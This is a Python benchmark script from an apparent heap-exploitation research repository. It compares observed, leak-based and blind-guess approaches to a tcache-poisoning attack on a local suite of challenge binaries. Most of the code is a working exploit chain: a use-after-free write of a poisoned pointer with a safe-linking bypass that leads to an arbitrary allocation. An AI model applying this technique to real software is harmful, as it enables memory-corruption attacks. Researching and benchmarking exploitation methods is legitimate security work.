heap-trm / bench /observe_once_benchmark.py
amarck's picture
Benchmark results: observe-once fails (stale addresses across processes)
bf8c369
#!/usr/bin/env python3
"""
observe_once_benchmark.py — The right architecture for heaptrm.
Not an iterative tool loop. Instead:
1. Observe heap layout once (heaptrm)
2. Compute exploit from observations (deterministic)
3. Execute exploit script against fresh binary
Compare:
Approach A: observe → compute → exploit (has addresses)
Approach B: guess → exploit (no addresses)
This is the fair test: does one observation call unlock exploitation
that's otherwise impossible?
"""
import subprocess
import json
import struct
import os
import time
from pathlib import Path
from dataclasses import dataclass
# Repository root: two directory levels above this script's own path.
ROOT = Path(__file__).parent.parent
# Directory under ROOT that this benchmark reads its challenge suite from.
SUITE = ROOT.joinpath("cve_tests", "suite")
# Location of the heaptrm release executable, kept as a plain string so it
# can be used directly as a subprocess argv element.
HEAPTRM = str(ROOT.joinpath("heaptrm-cli", "target", "release", "heaptrm"))
@dataclass
class Result:
    """Record of a single benchmark outcome.

    NOTE(review): nothing in the visible part of this file constructs or
    reads this class; the field meanings below are inferred from their
    names only and should be confirmed against any external users.
    """

    # Presumably the challenge (binary) name.
    challenge: str
    # Presumably the difficulty label of the challenge.
    difficulty: str
    # Presumably which exploitation approach produced this outcome.
    approach: str
    # Whether the attempt succeeded.
    success: bool
    # Free-form extra detail.
    info: str
def _extract_addresses(responses: list) -> dict:
    """Return chunk addresses from the newest response that has a usable heap view.

    A response is usable when its ``"heap"`` object reports at least two freed
    chunks and its chunk list contains both freed and allocated entries.
    Returns ``{}`` when no response qualifies.
    """
    for resp in reversed(responses):
        heap = resp.get("heap") if isinstance(resp, dict) else None
        if not isinstance(heap, dict) or heap.get("freed", 0) < 2:
            continue
        chunks = heap.get("chunks") or []
        freed = [c for c in chunks if c["state"] == "freed"]
        allocated = [c for c in chunks if c["state"] == "allocated"]
        if freed and allocated:
            return {
                "freed": [(c["index"], int(c["address"], 16)) for c in freed],
                "allocated": [(c["index"], int(c["address"], 16)) for c in allocated],
                "all_chunks": chunks,
            }
    return {}


def observe_heap(binary: str, size_class: int) -> dict:
    """Run one heaptrm session against *binary* and return observed addresses.

    The session sends three allocations (slots 0-2) of ``size_class``, frees
    slots 0 and 1, requests one ``observe`` and then ``quit``. Each command is
    a JSON object on its own line; one JSON line is read back per command.

    Args:
        binary: Path of the target program handed to heaptrm.
        size_class: Size-class argument forwarded in the allocation commands.

    Returns:
        ``{"freed": [(index, addr), ...], "allocated": [(index, addr), ...],
        "all_chunks": [...]}`` taken from the latest suitable response, or
        ``{}`` when heaptrm produced no suitable heap snapshot (including when
        it exited early or did not terminate within five seconds).

    Raises:
        OSError: If the heaptrm executable itself cannot be started.
    """
    commands = [
        {"action": "send", "data": f"1 0 {size_class}\n"},
        {"action": "send", "data": f"1 1 {size_class}\n"},
        {"action": "send", "data": f"1 2 {size_class}\n"},
        {"action": "send", "data": "4 0\n"},
        {"action": "send", "data": "4 1\n"},
        {"action": "observe"},
        {"action": "quit"},
    ]
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
        text=True,
    )
    responses = []
    try:
        for cmd in commands:
            proc.stdin.write(json.dumps(cmd) + "\n")
            proc.stdin.flush()
            line = proc.stdout.readline()
            if not line:
                # EOF: heaptrm is gone, further writes would only hit a
                # broken pipe.
                break
            try:
                responses.append(json.loads(line))
            except json.JSONDecodeError:
                # Ignore stray non-JSON output instead of aborting the run.
                continue
        proc.wait(timeout=5)
    except (BrokenPipeError, subprocess.TimeoutExpired):
        # Treat a dead or hung heaptrm as "no observation" and fall through
        # with whatever responses were collected.
        pass
    finally:
        # Always reap the child and release both pipes, even on failure.
        if proc.poll() is None:
            proc.kill()
        for stream in (proc.stdin, proc.stdout):
            try:
                stream.close()
            except OSError:
                pass
        proc.wait()

    return _extract_addresses(responses)
def exploit_with_observation(binary: str, obs: dict, size_class: int,
                             timeout: float = 5) -> bool:
    """Build a tcache-poisoning script from observed addresses and run it.

    The highest-addressed freed chunk in ``obs`` is treated as the chunk in
    slot 1 and the highest-addressed allocated chunk as the overwrite target.
    The addresses are used as-is: they are only meaningful if the fresh
    process started here reproduces the heap layout that was observed.

    Args:
        binary: Path of the target program; it is started without arguments
            and receives the whole command script on stdin.
        obs: Mapping with ``"freed"`` and ``"allocated"`` lists of
            ``(index, address)`` pairs.
        size_class: Size-class argument used in every allocation command.
        timeout: Seconds to wait for the target before giving up.

    Returns:
        True when the target's stdout contains the hex marker ``50574e4544``;
        False when ``obs`` lacks freed or allocated entries, the marker is
        absent, or the target does not finish within ``timeout``.
    """
    freed = obs.get("freed")
    allocated = obs.get("allocated")
    if not freed or not allocated:
        return False

    chunk1_addr = max(addr for _, addr in freed)
    target_addr = max(addr for _, addr in allocated)

    # Safe-linking bypass: the stored fd is the target XORed with the
    # position of the chunk holding it, shifted right by 12 bits.
    poisoned_fd = target_addr ^ (chunk1_addr >> 12)
    fd_hex = struct.pack("<Q", poisoned_fd).hex()

    # Same setup as the observation (alloc 3, free 2), then UAF write + drain.
    commands = (
        f"1 0 {size_class}\n"
        f"1 1 {size_class}\n"
        f"1 2 {size_class}\n"
        "4 0\n"
        "4 1\n"
        f"2 1 {fd_hex}\n"           # UAF write of the poisoned fd via slot 1
        f"1 3 {size_class}\n"       # first drain: returns the freed chunk
        f"1 4 {size_class}\n"       # second drain: intended to return the target
        "2 4 50574e454421210a\n"    # write "PWNED!!\n" through slot 4
        "3 2\n"                     # read back through slot 2
        "5\n"
    )
    try:
        proc = subprocess.run(
            [binary], input=commands.encode(),
            capture_output=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        # A target that hangs is a failed attempt, not a reason to abort the
        # whole benchmark.
        return False
    return b"50574e4544" in proc.stdout
def exploit_blind(binary: str, size_class: int, timeout: float = 5) -> bool:
    """Attempt the tcache poison with guessed addresses only.

    For each candidate offset from a fixed guessed heap base, a fresh target
    process is started and fed the full exploit script. Every guess places
    chunk 1 at ``base + offset + 0x50`` and the target 0x50 bytes after it,
    regardless of ``size_class``.

    Args:
        binary: Path of the target program; started once per guess.
        size_class: Size-class argument used in every allocation command.
        timeout: Seconds to wait for each target process.

    Returns:
        True as soon as one run prints the hex marker ``50574e4544`` on
        stdout; False when every guess fails or times out.
    """
    guess_base = 0x555555559000
    offsets_to_try = (0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600,
                      0x650, 0x700, 0x750, 0x800, 0x850, 0x900)

    # Only the poisoned fd differs between guesses; build the rest once.
    setup = (
        f"1 0 {size_class}\n"
        f"1 1 {size_class}\n"
        f"1 2 {size_class}\n"
        "4 0\n"
        "4 1\n"
    )
    finish = (
        f"1 3 {size_class}\n"
        f"1 4 {size_class}\n"
        "2 4 50574e454421210a\n"
        "3 2\n"
        "5\n"
    )

    for offset in offsets_to_try:
        chunk1_guess = guess_base + offset + 0x50
        target_guess = chunk1_guess + 0x50
        poisoned = target_guess ^ (chunk1_guess >> 12)
        fd_hex = struct.pack("<Q", poisoned).hex()
        script = f"{setup}2 1 {fd_hex}\n{finish}"

        # A wrong guess corrupts the tcache, so each guess needs its own
        # fresh process.
        try:
            proc = subprocess.run(
                [binary], input=script.encode(),
                capture_output=True, timeout=timeout,
            )
        except subprocess.TimeoutExpired:
            # A hung target means this guess failed; move on to the next.
            continue
        if b"50574e4544" in proc.stdout:
            return True
    return False
def _parse_alloc_address(reply):
    """Return the integer after the first ``0x`` in *reply*, or None if absent/invalid."""
    if not reply or b"0x" not in reply:
        return None
    try:
        return int(reply.split(b"0x")[1].split()[0], 16)
    except (ValueError, IndexError):
        return None


def exploit_blind_with_leak(binary: str, size_class: int, config: dict) -> bool:
    """Attempt the tcache poison using only what the target itself reveals.

    Drives one interactive pwntools process. Information is used in this
    order of preference:

    1. addresses printed in the replies to the slot 1 and slot 2 allocations;
    2. the fd read back from freed slot 1 (use-after-free read), decrypted
       with a guessed safe-linking key;
    3. the address printed for slot 0 alone, with guessed 0x50 spacing.

    Args:
        binary: Path of the target program.
        size_class: Size-class argument used in every allocation command.
        config: Manifest entry for the challenge; not consulted here.

    Returns:
        True when reading slot 2 after the poisoned write yields the hex
        marker ``50574e4544``; False when no usable information was obtained,
        the marker is absent, or any error occurs while talking to the target.

    Raises:
        ImportError: If pwntools is not installed.
    """
    from pwn import context, p64, process as pwn_process
    context.log_level = "error"

    p = pwn_process(binary)

    def request(line: str) -> bytes:
        """Send one command line and return the stripped first reply line."""
        p.sendline(line.encode())
        return p.recvline(timeout=1).strip()

    try:
        replies = [request(f"1 {slot} {size_class}") for slot in range(3)]
        addr0, addr1, addr2 = (_parse_alloc_address(r) for r in replies)

        request("4 0")
        request("4 1")

        # Use-after-free read of slot 1. The target prints chunk bytes as hex
        # in memory order (the success check below relies on that), so the
        # first 8 bytes must be decoded as a little-endian pointer rather
        # than read as one big hex number.
        leak = request("3 1")
        leaked_fd = None
        if leak and leak not in (b"DELETED", b"ERR") and len(leak) >= 16:
            try:
                leaked_fd = int.from_bytes(
                    bytes.fromhex(leak[:16].decode("ascii")), "little"
                )
            except ValueError:
                leaked_fd = None

        if addr1 and addr2:
            poisoned = addr2 ^ (addr1 >> 12)
        elif leaked_fd:
            guess_key = 0x555555559
            chunk0 = leaked_fd ^ guess_key
            # Reject the leak unless it decrypts into the guessed heap range.
            if not 0x555555550000 < chunk0 < 0x555555570000:
                return False
            poisoned = (chunk0 + 0xa0) ^ guess_key  # target offset is a guess
        elif addr0:
            poisoned = (addr0 + 0xa0) ^ ((addr0 + 0x50) >> 12)
        else:
            return False

        request(f"2 1 {p64(poisoned).hex()}")
        request(f"1 3 {size_class}")
        request(f"1 4 {size_class}")
        request(f"2 4 {b'PWNED!!'.hex()}")
        result = request("3 2")
        return bool(result) and b"50574e4544" in result
    except Exception:
        # Best-effort baseline: any failure while driving the target counts
        # as an unsuccessful attempt. KeyboardInterrupt is left to propagate.
        return False
    finally:
        try:
            p.close()
        except Exception:
            pass
def _count_wins(trials: int, attempt) -> int:
    """Call *attempt* ``trials`` times and count the calls that return a truthy value."""
    return sum(1 for _ in range(trials) if attempt())


def _success_rate(rows: list, key: str, trials: int) -> float:
    """Percentage of won trials in column *key* across *rows* (rows must be non-empty)."""
    return sum(r[key] for r in rows) / (len(rows) * trials) * 100


def main():
    """Run all three approaches on every challenge and report success rates.

    Reads ``manifest.json`` from the suite directory, skips entries whose
    binary is missing, and runs each remaining challenge for a fixed number
    of trials per approach:

    * heaptrm: observe once, then exploit with the observed addresses;
    * w/leak: no observation, but may use the target's own leaks;
    * blind: pure address guessing.

    Prints one line per challenge, a summary per difficulty plus an overall
    row, and writes the per-challenge counts to
    ``bench/observe_once_results.json`` relative to the current working
    directory. If no challenge binary is found, a notice is printed and no
    results file is written.
    """
    manifest = json.loads((SUITE / "manifest.json").read_text())
    trials = 10

    print("=" * 80)
    print("OBSERVE-ONCE BENCHMARK: heaptrm observe → exploit vs blind")
    print(f"{len(manifest)} challenges × {trials} trials")
    print("=" * 80)

    results = []
    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            continue

        size_class = 1  # every approach uses size class 1

        def observed_attempt() -> bool:
            obs = observe_heap(binary, size_class)
            return bool(obs) and exploit_with_observation(binary, obs, size_class)

        # Approach A: observe once with heaptrm, then exploit.
        ht_wins = _count_wins(trials, observed_attempt)
        # Approach B: blind, but may use the binary's own leaks.
        bl_wins = _count_wins(
            trials, lambda: exploit_blind_with_leak(binary, size_class, config)
        )
        # Approach C: pure blind guessing.
        guess_wins = _count_wins(trials, lambda: exploit_blind(binary, size_class))

        delta_blind = ht_wins - guess_wins
        if delta_blind > trials * 0.5:
            marker = ">>>"
        elif delta_blind > 0:
            marker = ">"
        else:
            marker = "=="

        results.append({
            "name": name, "difficulty": config["difficulty"],
            "ht": ht_wins, "leak": bl_wins, "blind": guess_wins,
            "uaf_read": config["uaf_read"], "addr_leak": config["addr_leak"],
            "noise": f"{config['noise_min']}-{config['noise_max']}",
        })
        print(f" {name} [{config['difficulty']:8s}] "
              f"heaptrm={ht_wins}/{trials} "
              f"w/leak={bl_wins}/{trials} "
              f"blind={guess_wins}/{trials} "
              f"| leak={config['addr_leak']:7s} uaf={config['uaf_read']} "
              f"noise={config['noise_min']}-{config['noise_max']} {marker}")

    if not results:
        # Without this guard the overall-rate computation divides by zero.
        print(f"\nNo challenge binaries found under {SUITE}; nothing to summarize.")
        return

    # Summary by difficulty
    print("\n" + "=" * 80)
    print("SUMMARY")
    print("=" * 80)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'w/leak':>10s} {'blind':>10s}")
    print("-" * 45)
    for diff in ["easy", "medium", "hard", "extreme"]:
        group = [r for r in results if r["difficulty"] == diff]
        if not group:
            continue
        ht = _success_rate(group, "ht", trials)
        lk = _success_rate(group, "leak", trials)
        bl = _success_rate(group, "blind", trials)
        print(f"{diff:10s} {ht:9.0f}% {lk:9.0f}% {bl:9.0f}%")

    ht_all = _success_rate(results, "ht", trials)
    lk_all = _success_rate(results, "leak", trials)
    bl_all = _success_rate(results, "blind", trials)
    print(f"{'OVERALL':10s} {ht_all:9.0f}% {lk_all:9.0f}% {bl_all:9.0f}%")

    # Save
    Path("bench").mkdir(exist_ok=True)
    with open("bench/observe_once_results.json", "w") as f:
        json.dump(results, f, indent=2)
    print("\nSaved to bench/observe_once_results.json")
# Script entry point: run the benchmark only when this file is executed
# directly, not when it is imported as a module.
if __name__ == "__main__":
    main()